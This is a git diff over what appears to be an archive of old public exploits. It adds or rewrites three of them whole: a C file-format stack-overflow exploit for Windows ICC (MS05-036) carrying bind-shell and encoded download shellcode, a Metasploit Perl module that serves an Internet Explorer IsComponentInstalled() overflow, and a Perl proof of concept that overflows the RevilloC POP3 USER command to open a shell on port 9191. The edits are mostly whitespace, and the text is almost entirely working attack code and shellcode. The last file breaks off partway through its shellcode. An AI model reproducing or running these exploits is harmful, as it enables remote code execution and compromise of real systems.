+"\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79"
+"\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97"
+"\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5"
+"\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
+"\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA"
+"\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC0\x00\x11\x08\x01\x20"
+"\x01\xE0\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01\xFF\xDA\x00\x0C"
+"\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xFD\xFC\xA0\x02\x80\x0A"
+"\x00\x28\x00\xA0\x02\x80\x0A\x00\x28\x00\xA0\x02\x80\x0A\x00\x28";
+
+struct {
+char *os;
+long jmpADD;
+long writeable_add;
+}
+
+targets[] = {
+{ "Windows XP without SP eng/rus", 0x77E9FC79,  0x00064000 },
+{ "Windows XP SP1 eng/rus       ", 0x77E9AE59,  0x00064000 },
+{ "Windows 2000 SP0             ", 0x77f8948b,  0x00064000 },
+{ "Crash Explorer               ", 0x41424344,  0x00064000 },
+{ "Dummy (crash all)            ", 0x0,         0x00064000 },
+}, v;
+
+unsigned char shellcode[] =
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
+"\xb0\x8c\x35\x83\xeb\xfc\xe2\xf4\xa2\xda\x67\x78\xb6\x49\x73\xca"
+"\xa1\xd0\x07\x59\x7a\x94\x07\x70\x62\x3b\xf0\x30\x26\xb1\x63\xbe"
+"\x11\xa8\x07\x6a\x7e\xb1\x67\x7c\xd5\x84\x07\x34\xb0\x81\x4c\xac"
+"\xf2\x34\x4c\x41\x59\x71\x46\x38\x5f\x72\x67\xc1\x65\xe4\xa8\x1d"
+"\x2b\x55\x07\x6a\x7a\xb1\x67\x53\xd5\xbc\xc7\xbe\x01\xac\x8d\xde"
+"\x5d\x9c\x07\xbc\x32\x94\x90\x54\x9d\x81\x57\x51\xd5\xf3\xbc\xbe"
+"\x1e\xbc\x07\x45\x42\x1d\x07\x75\x56\xee\xe4\xbb\x10\xbe\x60\x65"
+"\xa1\x66\xea\x66\x38\xd8\xbf\x07\x36\xc7\xff\x07\x01\xe4\x73\xe5"
+"\x36\x7b\x61\xc9\x65\xe0\x73\xe3\x01\x39\x69\x53\xdf\x5d\x84\x37"
+"\x0b\xda\x8e\xca\x8e\xd8\x55\x3c\xab\x1d\xdb\xca\x88\xe3\xdf\x66"
+"\x0d\xe3\xcf\x66\x1d\xe3\x73\xe5\x38\xd8\x81\x33\x38\xe3\x05\xd4"
+"\xcb\xd8\x28\x2f\x2e\x77\xdb\xca\x88\xda\x9c\x64\x0b\x4f\x5c\x5d"
+"\xfa\x1d\xa2\xdc\x09\x4f\x5a\x66\x0b\x4f\x5c\x5d\xbb\xf9\x0a\x7c"
+"\x09\x4f\x5a\x65\x0a\xe4\xd9\xca\x8e\x23\xe4\xd2\x27\x76\xf5\x62"
+"\xa1\x66\xd9\xca\x8e\xd6\xe6\x51\x38\xd8\xef\x58\xd7\x55\xe6\x65"
+"\x07\x99\x40\xbc\xb9\xda\xc8\xbc\xbc\x81\x4c\xc6\xf4\x4e\xce\x18"
+"\xa0\xf2\xa0\xa6\xd3\xca\xb4\x9e\xf5\x1b\xe4\x47\xa0\x03\x9a\xca"
+"\x2b\xf4\x73\xe3\x05\xe7\xde\x64\x0f\xe1\xe6\x34\x0f\xe1\xd9\x64"
+"\xa1\x60\xe4\x98\x87\xb5\x42\x66\xa1\x66\xe6\xca\xa1\x87\x73\xe5"
+"\xd5\xe7\x70\xb6\x9a\xd4\x73\xe3\x0c\x4f\x5c\x5d\xae\x3a\x88\x6a"
+"\x0d\x4f\x5a\xca\x8e\xb0\x8c\x35";
+  
+
+char shellcod2e[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf1\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
+"\xe8\xed\xff\xff\xff"
+/* 220 bytes shellcode, xor with 0xee */
+"\x07\x4a\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
+"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\xaa\xee\xee\xee"
+"\x0c\x17\x86\x81\x80\xee\xee\x86\x9b\x9c\x82\x83\xba\x11\xf8\x65"
+"\x06\x06\xc0\xee\xee\xee\x6d\x02\xce\x65\x32\x84\xce\xbd\x11\xb8"
+"\xea\x29\xea\xed\xb2\x8f\xc0\x8b\x29\xaa\xed\xea\x96\x8b\xee\xee"
+"\xdd\x2e\xbe\xbe\xbd\xb9\xbe\x11\xb8\xfe\x65\x32\xbe\xbd\x11\xb8"
+"\xe6\x11\xb8\xe2\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0\x96\xed\x1b\xb8"
+"\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b\xdd\x35\xe1\x50"
+"\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05\x1f\xd5\xf1\x9b"
+"\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65\xb0\xf2\xed\x33"
+"\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xb9\x11\x11\x11\x60\xa0"
+"\xe0\x02\x2f\x97\x0b\x56\x76\x10\x64\xe0\x90\x36\x0c\x9d\xd8\xf4"
+"\xc1\x9e\x86\x9a\x9a\x9e\xd4\xc1\xc1\xdf\xdc\xd9\xc0\xde\xc0\xde"
+"\xc0\xdf\xc1\x9a\x8b\x9d\x9a\xc0\x8b\x96\x8b\xee";
+
+
+unsigned char b[4];
+
+
+DWORD t2b(DWORD pBuf)
+{
+
+DWORD ret;
+
+*((char*)&ret + 0) = *((char*)&pBuf +3);
+*((char*)&ret + 1) = *((char*)&pBuf +2);
+*((char*)&ret + 2) = *((char*)&pBuf +1);
+*((char*)&ret + 3) = *((char*)&pBuf);
+
+return ret;
+
+}
+
+void get_bytes(long word)
+{
+b[0]=word&0xff;
+b[1]=(word>>8)& 0xff;
+b[2]=(word>>16)&0xff;
+b[3]=(word>>24)&0xff;
+}
+
+void err_exit(char *s)
+{
+printf("%s\n",s);
+exit(0);
+}
+
+
+
+void hexdump(char * pbuf,unsigned int size)
+{
+unsigned int i = 0;
+for (; i < size ; i++){
+printf("%.2X ", (unsigned char) pbuf[i]);
+if( (i+1) %16 == 0)
+putchar('\n');
+}
+
+return;
+}
+
+void buildfile()
+{
+int i=0;
+FILE *fd;
+
+if ((fd=fopen(FNAME,"wb"))==NULL) {
+err_exit("-> Failed to generate file...");
+}
+
+for(;i '%s' generated.\n",FNAME);
+printf("-> shellcode binds 3334 port.\n");
+
+}
+
+void dword_revert(char * p,unsigned int size)
+{
+DWORD * ptr = &p;
+int i = 0;
+char * q = p + size; //end
+
+for(; p <= q; p +=4)
+{
+*p ^= *(p+3);
+*(p+3) ^= *p;
+*p ^= *(p+3);
+
+*(p+1) ^= *(p+2);
+*(p+2) ^= *(p+1);
+*(p+1) ^= *(p+2);
+}
+
+
+return;
+}
+
+void list_target()
+{
+unsigned int i = 0 ;
+
+printf("\nTargets \t\t\n");
+while(targets[i].jmpADD != NULL){
+printf("#%d\t%s\n", i+1, targets[i].os);
+i++;
+}
+return;
+}
+
+
+
+int main(int argc, char *argv[])
+{
+int i=0, t=TARGET, size=0;
+int shal = 0;
+unsigned int sc_size = strlen(shellcode);
+unsigned int tag_size = stack_land_offset - tag_content_offset + 1 + sc_size ;
+long fRetaddr = 0x00;
+
+if (argc < 2) {
+printf("\n\n");
+
+printf("* Windows ICC stack overflow exploit (MS05-36)\n");
+printf("* Code Execution Exploit\n");
+printf("* (c) Darkeagle [ private code ]\n");
+printf("* usage -> ms05-036  (jmp/call esp)\n");
+list_target() ;
+exit(0);
+}
+
+t=atoi(argv[1]);
+
+if ( argc == 3 )
+sscanf(argv[2], "0x%x", &fRetaddr);
+
+memset(buff + tag_content_offset, 0x90,tag_size);
+
+*(DWORD*)(buff + no_access_violate2) = t2b(targets[t-1].writeable_add);
+*(DWORD*)(buff + no_access_violate)  = t2b(0x4);
+if ( fRetaddr == 0x00 )
+{
+*(DWORD*)(buff + ret_addr_offset)    = t2b(targets[t-1].jmpADD);
+} else {
+*(DWORD*)(buff + ret_addr_offset)    = t2b(fRetaddr);
+}
+strncpy(buff + stack_land_offset, shellcode, sc_size);
+dword_revert(buff + stack_land_offset, sc_size);
+
+tag_size = (tag_size >> 2 << 2) + 4;
+printf("current size: 0x%.8X\n",tag_size);
+*(DWORD*)(buff + content_size_offset) = t2b(tag_size);
+
+buildfile();
+
+return 0;
+
+}
+
+// milw0rm.com [2006-02-17]
diff --git a/platforms/windows/remote/1536.pm b/platforms/windows/remote/1536.pm
index eb6adc580..fa6aaffe4 100755
--- a/platforms/windows/remote/1536.pm
+++ b/platforms/windows/remote/1536.pm
@@ -1,224 +1,223 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::ie_iscomponentinstalled;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket::INET;
-use IPC::Open3;
-
-my $advanced =
-  {
-	'Gzip'       => [1, 'Enable gzip content encoding'],
-	'Chunked'    => [1, 'Enable chunked transfer encoding'],
-  };
-  
-my $info =
-  {
-	'Name'           => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow',
-	'Version'        => '$Revision: 1.2 $',
-	'Authors'        =>
-	  [
-		'H D Moore ',
-	  ],
-
-	'Description'    =>
-	  Pex::Text::Freeform(qq{
-		This module exploits a stack overflow in Internet Explorer. This bug was
-		patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
-}),
-
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32' ],
-	'Priv'           => 0,
-
-	'AutoOpts'       => { 'EXITFUNC' => 'thread' },
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  },
-
-	'Payload'        =>
-	  {
-		'Prepend'    => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",	  
-		'Space'      => 512,
-		'BadChars'   => "\x00\x5c\x0a\x0d\x22",
-		'Keys'     => ['-bind'],
-	  },
-	'Refs'           =>
-	  [
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-		[ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ]
-	  ],
-	
-	'Keys'           => [ 'ie' ],
-
-	'DisclosureDate' => 'Feb 24 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	);
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-
-	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
-		Pex::Utils::SourceIP('1.2.3.4') :
-		$self->GetVar('HTTPHOST');
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self = shift;
-	my $fd   = shift;
-
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-		
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
-	my $agent;
-	
-	# Read in the HTTP headers
-	while ((my $line = $fd->RecvLine(10))) {
-		
-		$line =~ s/^\s+|\s+$//g;
-		
-		my ($var, $val) = split(/\:/, $line, 2);
-
-		# Break out if we reach the end of the headers
-		last if (not defined($var) or not defined($val));
-
-		$agent = $val if $var =~ /User-Agent/i;
-	}
-	
-	$self->PrintLine("[*] Client connected from $rhost:$rport ($agent)");
-
-	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
-
-	$fd->Close();
-}
-
-sub GenerateHTML {
-	my $self        = shift;
-	my $target      = $self->Targets->[$self->GetVar('TARGET')];
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $pattern     = Pex::Text::AlphaNumText(8192);
-	
-	substr($pattern, 755, 4, pack('V',  $target->[1] ));
-	substr($pattern, 755 + 2888, length($shellcode), $shellcode);
-
-	my $data        = qq|
-
-
-	One second please...
-	
-
-
-One second please...
-
-
-|;
-	return $data;
-}
-
-sub BuildResponse {
-	my ($self, $content) = @_;
-
-	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
-	  "Content-Type: text/html\r\n";
-
-	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
-	}
-	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
-	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
-	}
-
-	$response .= "\r\n" . $content;
-
-	return $response;
-}
-
-sub Chunk {
-	my ($self, $content) = @_;
-
-	my $chunked;
-	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
-	$chunked .= "0\r\n\r\n";
-
-	return $chunked;
-}
-
-sub Gzip {
-	my $self = shift;
-	my $data = shift;
-	my $comp = int(rand(5))+5;
-
-	my($wtr, $rdr, $err);
-
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
-	close ($wtr);
-	local $/;
-
-	return (<$rdr>);
-}
-1;
-
-
-# milw0rm.com [2006-02-28]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::ie_iscomponentinstalled;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+use IPC::Open3;
+
+my $advanced =
+  {
+	'Gzip'       => [1, 'Enable gzip content encoding'],
+	'Chunked'    => [1, 'Enable chunked transfer encoding'],
+  };
+  
+my $info =
+  {
+	'Name'           => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow',
+	'Version'        => '$Revision: 1.2 $',
+	'Authors'        =>
+	  [
+		'H D Moore ',
+	  ],
+
+	'Description'    =>
+	  Pex::Text::Freeform(qq{
+		This module exploits a stack overflow in Internet Explorer. This bug was
+		patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
+}),
+
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32' ],
+	'Priv'           => 0,
+
+	'AutoOpts'       => { 'EXITFUNC' => 'thread' },
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+	  },
+
+	'Payload'        =>
+	  {
+		'Prepend'    => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",	  
+		'Space'      => 512,
+		'BadChars'   => "\x00\x5c\x0a\x0d\x22",
+		'Keys'     => ['-bind'],
+	  },
+	'Refs'           =>
+	  [
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+		[ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ]
+	  ],
+	
+	'Keys'           => [ 'ie' ],
+
+	'DisclosureDate' => 'Feb 24 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	);
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+
+	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+		Pex::Utils::SourceIP('1.2.3.4') :
+		$self->GetVar('HTTPHOST');
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self = shift;
+	my $fd   = shift;
+
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+		
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+	my $agent;
+	
+	# Read in the HTTP headers
+	while ((my $line = $fd->RecvLine(10))) {
+		
+		$line =~ s/^\s+|\s+$//g;
+		
+		my ($var, $val) = split(/\:/, $line, 2);
+
+		# Break out if we reach the end of the headers
+		last if (not defined($var) or not defined($val));
+
+		$agent = $val if $var =~ /User-Agent/i;
+	}
+	
+	$self->PrintLine("[*] Client connected from $rhost:$rport ($agent)");
+
+	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
+
+	$fd->Close();
+}
+
+sub GenerateHTML {
+	my $self        = shift;
+	my $target      = $self->Targets->[$self->GetVar('TARGET')];
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $pattern     = Pex::Text::AlphaNumText(8192);
+	
+	substr($pattern, 755, 4, pack('V',  $target->[1] ));
+	substr($pattern, 755 + 2888, length($shellcode), $shellcode);
+
+	my $data        = qq|
+
+
+	One second please...
+	
+
+
+One second please...
+
+
+|;
+	return $data;
+}
+
+sub BuildResponse {
+	my ($self, $content) = @_;
+
+	my $response =
+	  "HTTP/1.1 200 OK\r\n" .
+	  "Content-Type: text/html\r\n";
+
+	if ($self->GetVar('Gzip')) {
+		$response .= "Content-Encoding: gzip\r\n";
+		$content = $self->Gzip($content);
+	}
+	if ($self->GetVar('Chunked')) {
+		$response .= "Transfer-Encoding: chunked\r\n";
+		$content = $self->Chunk($content);
+	} else {
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		  "Connection: close\r\n";
+	}
+
+	$response .= "\r\n" . $content;
+
+	return $response;
+}
+
+sub Chunk {
+	my ($self, $content) = @_;
+
+	my $chunked;
+	while (length($content)) {
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+	}
+	$chunked .= "0\r\n\r\n";
+
+	return $chunked;
+}
+
+sub Gzip {
+	my $self = shift;
+	my $data = shift;
+	my $comp = int(rand(5))+5;
+
+	my($wtr, $rdr, $err);
+
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	print $wtr $data;
+	close ($wtr);
+	local $/;
+
+	return (<$rdr>);
+}
+1;
+
+
+# milw0rm.com [2006-02-28]
diff --git a/platforms/windows/remote/155.c b/platforms/windows/remote/155.c
index 4949f743c..eea58e09b 100755
--- a/platforms/windows/remote/155.c
+++ b/platforms/windows/remote/155.c
@@ -227,6 +227,6 @@
   url : http://www.coromputer.net
   mail : kralor@coromputer.net
 
-\*============================\* www.coromputer.net */===========================*/
-
-// milw0rm.com [2004-02-26]
+\*============================\* www.coromputer.net */===========================*/
+
+// milw0rm.com [2004-02-26]
diff --git a/platforms/windows/remote/1565.pl b/platforms/windows/remote/1565.pl
index 43db932b4..db66a8feb 100755
--- a/platforms/windows/remote/1565.pl
+++ b/platforms/windows/remote/1565.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl -w    
-#revilloC mail server PoC exploit ( for xp sp1)
-# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
-#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
-#The mail server is a central point for emails coming in and going out from  home or office
-#The service will work with any standard email client that supports POP3 and SMTP.  
-#by sending a large buffer  after USER commands
-#C:\>nc 127.0.0.1 110
-#+OK RevilloC POP3 Ready
-#USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
-#we have:
-#access violation when reading [dddddddd].
-#ntdll!wcsncat+0x387:
-#7C92B3FB   8B0B     MOV ECX,DWORD PTR DS:[EBX]  --->EBX pointe to  "\xdd"x4
-#ECX   dddddddd
-#EAX   FFFFFFFF  
-#Vendor contacted 14/01/2006 , No response,No patch.
-#this entire document is for eductional, testing and demonstrating purpose only.
-#greets all MorX members,undisputed,sara
-#!/usr/bin/perl -w     	  
-use IO::Socket;
-                     if ($#ARGV<0) 
-                    { 
-                         print "\n write the target IP!! \n\n"; 
-                       exit; 
-                     } 
-
-        $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
-                      "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
-                      "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
-                      "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
-                      "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
-                      "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
-                      "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
-                      "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
-                      "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
-                      "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
-                      "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
-                      "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
-                      "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
-                      "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
-                      "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
-                      "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
-                      "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
-                      "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
-                      "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
-                      "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
-                      "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
-                      "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
-                      "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
-                      "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
-                      "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
-                      "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
-                      "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
-                      "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
-                      "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
-                      "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
-                      "\xD3\x4A\x8C\x88";
-                $buffer = "\x90"x3601;
-                $eax ="\x83\xb5\x19\x01"; # change if needed             
-                $peb= "\x20\xf0\xfd\x7f"; #PEB lock
-                $user ="USER  ";
-                $enter  = "\x0d\x0a";
-                $connect = IO::Socket::INET ->new (Proto=>"tcp",
-	      PeerAddr=> "$ARGV[0]",
-	      PeerPort=>"110"); unless ($connect) { die "cant connect" }  
-                print "\nRevilloC mail server remote PoC exploit by securma massine\n";
-                print "\nsecurma\@morx.org\n";
-                print "\n+++++++++++www.morx.org++++++++++++++++\n";              
-                $connect->recv($text,128); 
-                print "$text\n";
-                print "[+] Sent USER\n";
-                $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); 
-	      print "[+] Sent shellcode..telnet to victim host port 9191\n";
-
-# milw0rm.com [2006-03-07]
+#!/usr/bin/perl -w    
+#revilloC mail server PoC exploit ( for xp sp1)
+# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
+#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
+#The mail server is a central point for emails coming in and going out from  home or office
+#The service will work with any standard email client that supports POP3 and SMTP.  
+#by sending a large buffer  after USER commands
+#C:\>nc 127.0.0.1 110
+#+OK RevilloC POP3 Ready
+#USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
+#we have:
+#access violation when reading [dddddddd].
+#ntdll!wcsncat+0x387:
+#7C92B3FB   8B0B     MOV ECX,DWORD PTR DS:[EBX]  --->EBX pointe to  "\xdd"x4
+#ECX   dddddddd
+#EAX   FFFFFFFF  
+#Vendor contacted 14/01/2006 , No response,No patch.
+#this entire document is for eductional, testing and demonstrating purpose only.
+#greets all MorX members,undisputed,sara
+#!/usr/bin/perl -w     	  
+use IO::Socket;
+                     if ($#ARGV<0) 
+                    { 
+                         print "\n write the target IP!! \n\n"; 
+                       exit; 
+                     } 
+
+        $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
+                      "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
+                      "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
+                      "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
+                      "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
+                      "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
+                      "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
+                      "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
+                      "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
+                      "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
+                      "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
+                      "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
+                      "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
+                      "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
+                      "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
+                      "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
+                      "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
